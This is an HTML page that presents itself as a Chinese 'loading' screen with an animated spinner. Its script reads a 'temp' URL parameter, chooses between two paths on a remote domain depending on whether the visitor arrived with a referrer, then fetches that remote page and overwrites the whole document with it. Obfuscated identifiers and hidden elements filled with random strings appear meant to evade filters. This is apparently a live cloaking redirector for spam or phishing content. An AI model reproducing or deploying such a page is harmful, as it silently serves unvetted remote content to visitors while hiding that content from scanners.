<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zl9zCW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zl9zCW .r4mczD2yCP {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zl9zCW .content {
            line-height: 50px;
            text-align: center
        }

        .zl9zCW .img {
            width: 100%
        }

        .zl9zCW .PcGhns {
            text-align: center
        }

        .zl9zCW .PcGhns span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zl9zCW .PcGhns span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zl9zCW .PcGhns span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zl9zCW .PcGhns span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zl9zCW .PcGhns span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zl9zCW .PcGhns span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zl9zCW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rD95RbyBHKB(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wM9YSd = rD95RbyBHKB('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wM9YSd +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wM9YSd +".html?a=share";
		}
		
        bPedC3105=url+"#"+new Date().getTime();
        bPedC3105 && function() {
            $.get(bPedC3105, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>jRxSAwc5lvzAbG2J6Ojjgoagjopy5oPdTiX7SDYaHM5XpuDaaCJkOrG70AkoQnMKHhONJOe3thwXbrR9zYevJ</p>
<a  href='#' style='display:none'>WKpmAnw662v2JozPr7Ki8QdlVeeGJxZKgK5vga2SrVMQh2Cvy31MD0OravHRXWZcR5xjpaE0nE</a>
<img  src='' style='display:none'>
<div style='display:none'>oZCnMDRdi1KnCnBV1HM4LOTzJzYAtt92THFRPbz2YWB9HKkg2la69gNco</div><div class="zl9zCW">
    <div class="r4mczD2yCP">
        <div class="PcGhns">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >vBAzhO43YKn</li>
<div style='display:none'>s5tu8r68Adu8Wh8RCiJUqz8po10Vbzm0CmOH1ZRkhgkxFRtArZNlxW8</div>
<span style='display:none'>NNmrcLMKdSrECBmicxt426rnmPZ3Qho9854HhB1GVkWx20fSG2Vk3ZR5KfAv2W8NZr9PAlQRvtcxQdXg</span>
<ul style='display:none' >MXzdtmeMC0KGUAszRgwg1k2SFPI4sKDx8zARGL7sEdiLVK2bTcutdlPiy5YsBYjHLk4Wf7q</ul>
<div style='display:none'>s5tu8r68Adu8Wh8RCiJUqz8po10Vbzm0CmOH1ZRkhgkxFRtArZNlxW8</div>
<b style='display:none' >GigjnpXnIKUWh8uAENxws4m7ZaTSk0MU5JIDyROgphIpIfzQrvdgJSZKvJal6jSj3R0pHNlO7d4mnd</b>
<b style='display:none' >GigjnpXnIKUWh8uAENxws4m7ZaTSk0MU5JIDyROgphIpIfzQrvdgJSZKvJal6jSj3R0pHNlO7d4mnd</b>
<img  src='' style='display:none'></body>
</html>